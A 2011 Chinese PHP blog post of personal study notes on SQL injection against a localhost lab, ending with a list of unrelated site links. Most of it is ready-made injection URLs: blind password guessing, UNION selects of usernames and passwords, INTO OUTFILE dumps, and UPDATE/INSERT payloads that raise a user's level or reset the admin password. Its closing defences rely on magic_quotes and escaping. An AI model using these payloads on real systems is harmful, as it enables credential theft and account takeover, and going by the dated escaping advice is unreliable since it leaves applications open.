PHP的SQL注入实现(测试代码安全不错)


Posted in PHP onFebruary 27, 2011

SQL注入的重点就是构造SQL语句,只有灵活的运用SQL
语句才能构造出牛比的注入字符串。学完之后写了点笔记,已备随时使用。希望你在看下面内容时先了
解SQL的基本原理。笔记中的代码来自网络。
===基础部分===
本表查询:
http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m

Union联合语句:
http://127.0.0.1/injection/show.php?id=1' union select 1,username,password from user/*
http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/*

导出文件:
http://127.0.0.1/injection/user.php?username=angel' into outfile 'c:/file.txt
http://127.0.0.1/injection/user.php?username=' or 1=1 into outfile 'c:/file.txt
http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt

INSERT语句:
INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');
构造homepage值为:http://4ngel.net', '3')#
SQL语句变为:INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3')#', '1');

UPDATE语句:我喜欢这样个东西
先理解这句SQL
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'
如果此SQL被修改成以下形式,就实现了注入
1:修改homepage值为
http://4ngel.net', userlevel='3
之后SQL语句变为
UPDATE user SET password='mypass', homepage='http://4ngel.net', userlevel='3' WHERE id='$id'
userlevel为用户级别
2:修改password值为
mypass)' WHERE username='admin'#
之后SQL语句变为
UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'
3:修改id值为
' OR username='admin'
之后SQL语句变为
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'

===高级部分===
常用的MySQL内置函数
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
database()
version()
SUBSTRING()
MID()
char()
load_file()
……
函数应用
UPDATE article SET title=DATABASE() WHERE id=1
http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()
SELECT * FROM user WHERE username=char(97,110,103,101,108)
# char(97,110,103,101,108) 相当于angel,十进制
http://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115)http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100)
http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111

确定数据结构的字段个数及类型
http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1
http://127.0.0.1/injection/show.php?id=-1 union select char(97),char(97),char(97)

猜数据表名
http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 from members

跨表查询得到用户名和密码
http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

其他
#验证第一位密码
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49

===注入防范===
服务器方面
magic_quotes_gpc设置为On
display_errors设置为Off
编码方面
$keywords = addslashes($keywords);
$keywords = str_replace("_","\_",$keywords);
$keywords = str_replace("%","\%",$keywords);
数值类型
使用intval()抓换
字符串类型
SQL语句参数中要添加单引号
下面代码,用于防治注入
if (get_magic_quotes_gpc()) {
//....
}else{
$str = mysql_real_escape_string($str);
$keywords = str_replace("_","\_",$keywords);
$keywords = str_replace("%","\%",$keywords);
}
有用的函数
stripslashes()
get_magic_quotes_gpc()
mysql_real_escape_string()
strip_tags()
array_map()
addslashes()
参考文章:
http://www.4ngel.net/article/36.htm (SQL Injection with MySQL)中文
http://www.phpe.net/mysql_manual/06-4.html(MYSQL语句参考)

PHP 相关文章推荐
优化PHP代码的53条建议
Mar 27 PHP
PHP实现把MySQL数据库导出为.sql文件实例(仿PHPMyadmin导出功能)
May 10 PHP
支持生僻字且自动识别utf-8编码的php汉字转拼音类
Jun 27 PHP
php算法实例分享
Jul 14 PHP
ucenter中词语过滤原理分析
Jul 13 PHP
注意!PHP 7中不要做的10件事
Sep 18 PHP
浅谈php中的循环while、do...while、for、foreach四种循环
Nov 05 PHP
PHP实现的同步推荐操作API接口案例分析
Nov 30 PHP
thinkphp 字母函数详解T/I/N/D/M/A/R/U
Apr 03 PHP
关于php 高并发解决的一点思路
Apr 16 PHP
PHP操作MongoDB实现增删改查功能【附php7操作MongoDB方法】
Apr 24 PHP
PHP封装XML和JSON格式数据接口操作示例
Mar 06 PHP
php通用防注入程序 推荐
Feb 26 #PHP
8个出色的WordPress SEO插件收集
Feb 26 #PHP
zend framework多模块多布局配置
Feb 26 #PHP
让你成为更出色的PHP开发者的10个技巧
Feb 25 #PHP
理解php Hash函数,增强密码安全
Feb 25 #PHP
php中根据某年第几天计算出日期年月日的代码
Feb 24 #PHP
PHP中防止SQL注入实现代码
Feb 19 #PHP
You might like
用C/C++扩展你的PHP 为你的php增加功能
2012/09/06 PHP
PHP实现搜索时记住状态的方法示例
2018/05/11 PHP
javascript编程起步(第六课)
2007/02/27 Javascript
建立良好体验度的Web注册系统ajax
2007/07/09 Javascript
javascript:void(0)的真正含义实例分析
2008/08/20 Javascript
JavaScript中常见陷阱小结
2010/04/27 Javascript
JavaScrip单线程引擎工作原理分析
2010/09/04 Javascript
jQuery .tmpl(), .template()学习资料小结
2011/07/18 Javascript
一个基于jquery的文本框记数器
2012/09/19 Javascript
一个页面元素appendchild追加到另一个页面元素的问题
2013/01/27 Javascript
JS与C#编码解码
2013/12/03 Javascript
浅谈setTimeout 与 setInterval
2015/06/23 Javascript
jquery实现横向图片轮播特效代码分享
2015/11/19 Javascript
jquery插件uploadify实现带进度条的文件批量上传
2015/12/13 Javascript
基于gulp合并压缩Seajs模块的方式说明
2016/06/14 Javascript
JS实现按钮添加背景音乐示例代码
2017/10/17 Javascript
javascript系统时间设置操作示例
2019/06/17 Javascript
利用python微信库itchat实现微信自动回复功能
2017/05/18 Python
python字符串,元组,列表,字典互转代码实例详解
2020/02/14 Python
Django模型中字段属性choice使用说明
2020/03/30 Python
Python多线程:主线程等待所有子线程结束代码
2020/04/25 Python
Python实现疫情通定时自动填写功能(附代码)
2020/05/27 Python
Python制作数据预测集成工具(值得收藏)
2020/08/21 Python
加拿大建筑和装修专家:Reno-Depot
2017/12/21 全球购物
美国修容界大佬创建的个人美妆品牌:Kevyn Aucoin Beauty
2018/12/12 全球购物
简述网络文件系统NFS,并说明其作用
2016/10/19 面试题
高级Java程序员面试要点
2013/08/02 面试题
技校毕业生个人学习的自我评价
2014/02/21 职场文书
《青山处处埋忠骨》教学反思
2014/04/22 职场文书
本科生求职信
2014/06/17 职场文书
师范学院毕业生求职信
2014/06/24 职场文书
售后客服个人自我评价
2014/09/14 职场文书
实训报告范文大全
2014/11/04 职场文书
2014年党总支工作总结
2014/12/18 职场文书
2015年护士医德医风自我评价
2015/03/03 职场文书
农村房屋租赁合同(范本)
2019/07/23 职场文书